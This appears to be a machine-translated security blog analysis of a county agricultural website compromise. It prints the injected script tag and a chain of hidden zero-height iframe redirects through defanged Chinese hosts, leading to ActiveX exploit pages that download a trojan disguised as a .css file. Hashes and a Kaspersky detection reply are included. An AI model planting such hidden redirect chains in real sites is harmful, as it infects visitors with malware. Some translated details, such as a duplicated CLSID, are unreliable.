Agricultural net Trojan Trojan-Downloader.Win32.ACVE.az in a county

Agricultural net Trojan Trojan-Downloader.Win32.ACVE.az in a county

Original endurer
1st-

The home page contains code:
/---
<Script c src = hxp: // ads ***. 2*0 *-1 *** 0.cn/ad/ad.gif? Id = O> </SCRIPT>
---/

#1 hxxp: // ads ***. 2*0 *-1 *** 0.cn/ad/ad.gif? Id = O contains code:
/---
Document. writeln ("<IFRAME src = hxxp: // CC * CAA ** ass.cn//11//zz.htm width = 100 Height = 0> <// IFRAME> ");
---/

#1.1 hxxp: // CC * CAA ** ass.cn/11/zz.htm contains the Code:
/---
<IFRAME src = hxxp: // www *. h ** ry ** spal.cn/llbw/48.htm width = 50 height = 0 border = 0> </iframe>
---/

#1.1.1 hxxp: // www *. h ** ry ** spal.cn/llbw/41.htm contains the Code:
/---
<IFRAME src = "hxxp: // z * LW ** rn * m * 8.cn/a14/fxx.htm" width = 100 Height = 0> </iframe>
---/

#1.1.1.1 hxxp: // z * LW ** rn * m * 8.cn/a14/fxx.htm
Reference the following page:

#1.1.1.1.1 hxxp: // z * LW ** rn * m * 8.cn/a14/fx.htm
Check the browser type. If it is MSIE, the code is output:
/---
<IFRAME src=ilink.html width = 100 Height = 0> </iframe>
---/
Otherwise, the output code is as follows:
/---
<IFRAME src1_flink.html width = 100 Height = 0> </iframe>
---/

#1.1.1.1.1.1 hxxp: // z * LW ** rn * m * 8.cn/a14/ilink.html
Check the Flash Player version and download the corresponding files: 5.swf,i45.swf,i16.swf,i28.swf,i47.swf

#1.1.1.1.1.2 hxxp: // z * LW ** rn * m * 8.cn/a14/flink.html
Same as above

#1.1.1.1.2 hxxp: // z * LW ** rn * m * 8.cn/a14/ss.html
Use the (snpvw. Snapshot Viewer control.1) vulnerability to download hxxp: // www. * o * Iuy * T * r *. Net/New/a14.css

 

File Description: D:/test/a14.css
Attribute: ---
Digital Signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Size: 23761 bytes, 23.209 KB
MD5: 2025eeb6666507cbbf449bb280e51430
Sha1: cd777b9660719574346098eaf7206d7507b91702
CRC32: 869c5aa2

 

Subject: Re: a14.css [KLAN-12788462]
Sender: "" <newvirus@kaspersky.com> sent at: 12:46:58

Hello,

A14.css-Trojan-Downloader.Win32.ACVE.az

New malicious software was found in this file. It's detection will be added in the next update. Thank you for your help.

Please quote all when answering.
The answer is relevant to the latest bases from Update sources.
-----------------
Regards, Vitaly butuzov
Virus analyst, Kaspersky Lab.

 

#1.1.1.1.3 hxxp: // z * LW ** rn * m * 8.cn/sina.htm
/---
File does not exist
---/

#1.1.1.1.4 hxxp: // z * LW ** rn * m * 8.cn/u.htm

Use the uusee (CLSID: 2cacd7bb-1c59-4bbb-8e81-6e83f82c813b) vulnerability.

#1.1.1.1.4.1 hxxp: // www. * o * Iuy * T * r *. Net/down/UU. ini
/---
File does not exist
---/

#1.1.1.1.4.2 hxxp: // www.uusee.com/mini3/uusee_client_update/remark.php
Kaspersky Report: Trojan-Downloader.JS.Agent.cgt

#1.1.1.1.5 hxxp: // z * LW ** rn * m * 8.cn/a14/thunder.html
Download hxxp: // www. * o * Iuy * T * r *. Net/New/a14.css with thunder (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) Vulnerability

#1.1.1.1.6 hxxp: // z * LW ** rn * m * 8.cn/a14/glworld.html
/---
File does not exist
---/

#1.1.1.1.7 hxxp: // z * LW ** rn * m * 8.cn/a14/real.htm
Download hxxp: // www. * o * Iuy * T * r *. Net/New/a14.css with RealPlayer (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) Vulnerability

#1.1.1.1.8 hxxp: // z * LW ** rn * m * 8.cn/a14/real.html
Same as above.